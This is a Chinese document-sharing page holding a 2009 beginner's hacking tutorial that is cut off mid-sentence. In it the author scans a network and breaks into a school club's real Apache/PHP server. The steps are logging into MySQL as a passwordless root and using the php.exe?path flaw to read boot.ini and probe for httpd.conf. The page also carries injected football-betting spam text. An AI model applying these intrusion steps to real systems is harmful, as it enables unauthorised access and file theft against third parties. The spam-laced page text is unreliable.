- 1、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
看紧你的3306端口,一次通过mysql的入侵 阅读:217 时间:2009-8-11 8:00:30 用superscan扫了一下 某个c类的网段,寻找开放80端口的机器,结果就只有一台机器 开放了80端口,试着连了一下,是我们学校某个社团的的主页。 从端口的banner来看应该是apache(win32),证实一下 telnet 211.87.xxx.xxx get(回车) !DOCTYPE HTML PUBLIC -//IETF//DTD HTML 2.0//EN HTMLHEAD TITLE501 Method Not Implemented/TITLE /HEADBODY H1Method Not Implemented/H1 get to /index .html not supported.P Invalid method in request getP HR ADDRESSApache/1.3.2 2 Server at Port 80/ADDRESS /BODY/HTML 遗失对主机的连接。 C:\ 呵呵,这下看得更清楚了 据我猜测,应该是“apache+mysql+php”的黄金组合吧 习惯性的mysql -h 211.87.xxx.xxx 果然连上了 Welcome to the MySQL monitor. Commands end with or \g. Your MySQL connection id is 17 to server version: 3.23.53-max-nt Type help; or \h for help. Type \c to clear the buffer. mysql 断开试着 mysql -h 211.87.xxx.xxx -u root -p password: Welcome to the MySQL monitor. Commands end with or \g. Your MySQL connection id is 18 to server version: 3.23.53-max-nt Type help; or \h for help. Type \c to clear the buffer. mysql 呵呵,大家看到了他的root用户没有密码,这是我今天要说的第一个主题。 这是相当的危险的,碰见这种情况,有99.999%的可能可以进入 既然使用的apache+php,只要找到他在本地存放的web的物理路径就为所欲为了 呵呵 下一个问题是我今天要说的重点怎么样才能知道那台主机的存放的web的物理路径? 方法有很多种,在这里我介绍2种方法供初学者参考 首先要告诉大家的是低版本的apache+php有一个漏洞 提http://xxx.xxxx.xxx.xxx/php/php.exe?对方的物理文件名 就可以把那个物理文件下载下来。 于是提http://211.87.xxx.xxx/php/php.exe?c:\a.txt 返回 No input file specified. (没有这个漏洞的话提示找不到网页) 好的,这说明他有这个漏洞。 在提http://211.87.xxx.xxx/php/php.exe?c:\boot.ini 返回 [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=Microsoft Windows XP Professional /fastdetect 呵呵,装的还是xp。 好了,我们可以猜测对方apache的conf文件的物理位置了 http://211.87.xxx.xxx/php/php.exe?c:\apache\conf\httpd.conf No input file specified. http://211.87.xxx.xxx/php/php.exe?d:\apache\conf\httpd.conf No input file specified. http://211.87.xxx.xxx/php/php.exe?e:\apache\conf\httpd.conf No input file specified. http://211.87.xxx.xxx/php/php.exe?c:\Program Files\apache\conf\httpd.conf No input file specified. http://211.87.xxx.xxx/php/php
您可能关注的文档
最近下载
- 国企中层领导竞聘笔试题(含答案).docx VIP
- 小学与初中英语衔接教学建议.ppt
- 2025年证券从业资格考试真题及答案.docx VIP
- ABB SPAM150C 电动机保护继电器模件 手册(中文).pdf
- 2023年标准化工程师考试试题.pdf VIP
- 新版西师大版三年级数学上册应用题专项练习题 .docx VIP
- 精装修工程冬季施工方案、.doc VIP
- INFINI Labs(曾勇):下一代纯实时有哪些信誉好的足球投注网站引擎INFINI Pizza.pdf VIP
- DB62_T 5087-2025 马铃薯品种 天薯15号.docx VIP
- DB41_T 2829-2025 大口黑鲈池塘养殖技术规范.docx VIP
有哪些信誉好的足球投注网站
文档评论(0)